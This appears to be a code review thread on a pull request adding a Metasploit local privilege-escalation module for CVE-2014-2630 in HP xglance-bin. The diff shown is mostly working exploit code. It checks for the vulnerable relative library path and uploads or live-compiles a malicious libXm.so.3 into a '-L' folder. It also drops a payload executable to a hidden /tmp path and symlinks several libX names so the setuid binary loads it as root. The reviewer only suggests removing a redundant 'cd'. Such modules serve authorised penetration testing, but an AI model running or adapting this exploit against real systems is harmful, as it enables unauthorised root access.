modules/exploits/linux/local/hp_xglance_priv_esc.rb

```diff
@@ -0,0 +1,181 @@
+  end
+
+  def find_libs
+    libs = cmd_exec 'ldd /opt/perf/bin/xglance-bin | grep libX'
+    /(?<lib>libX.+\.so\.\d) => -L\/lib64/ =~ libs
+    return nil if lib.nil?
+    lib
+  end
+
+  def check
+    unless file? '/opt/perf/bin/xglance-bin'
+      vprint_error "/opt/perf/bin/xglance-bin not found on system"
+      return CheckCode::Safe
+    end
+    #libs = cmd_exec 'ldd /opt/perf/bin/xglance-bin | grep libX'
+    lib = find_libs
+    if lib.nil?
+      vprint_error 'Patched xglance-bin, not linked to -L/lib64/'
+      return CheckCode::Safe
+    end
+    vprint_good "xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}"
+    CheckCode::Appears
+  end
+
+  def exploit
+    unless check == CheckCode::Appears
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    # delete exploit folder in case a previous attempt failed
+    vprint_status("Deleting exploit folder: #{base_dir}/-L")
+    rm_f "#{base_dir}/-L"
+    # make folder
+    vprint_status("Creating exploit folder: #{exploit_folder}")
+    cmd_exec "mkdir -p #{exploit_folder}"
+    register_dir_for_cleanup "#{base_dir}/-L"
+
+    # drop our .so on the system that calls our payload
+    # we need gcc to compile instead of metasm since metasm
+    # removes unused variables, which we need to keep xglance-bin
+    # from breaking and not launching our exploit
+    so_file = "#{exploit_folder}libXm.so.3"
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+      code = exploit_data('CVE-2014-2630.c')
+      code.sub!('#{payload_path}', payload_path) # inject our payload path
+      upload_and_compile so_file, code, '-fPIC -shared -static-libgcc'
+      rm_f "#{so_file}.c"
+    else
+      payload_path = '/tmp/.u4aLoiq'
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      upload_and_chmodx so_file, exploit_data('libXm.so.3')
+    end
+
+    # Upload payload executable
+    vprint_status 'uploading payload'
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    # link so files to exploit vuln
+    lib = find_libs
+    # just to be safe, Xt and Xp were in the original exploit
+    # our mock binary is also exploitsable through libXmu.so.6
+    # unsure about the real binary
+    ['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l|
+      cmd_exec "cd #{exploit_folder}; ln -s libXm.so.3 #{l}"
```

Comment:
Unless I'm missing something, it shouldn't be necessary to `cd` here.
```suggestion
      cmd_exec "ln -s libXm.so.3 #{exploit_folder}/#{l}"
```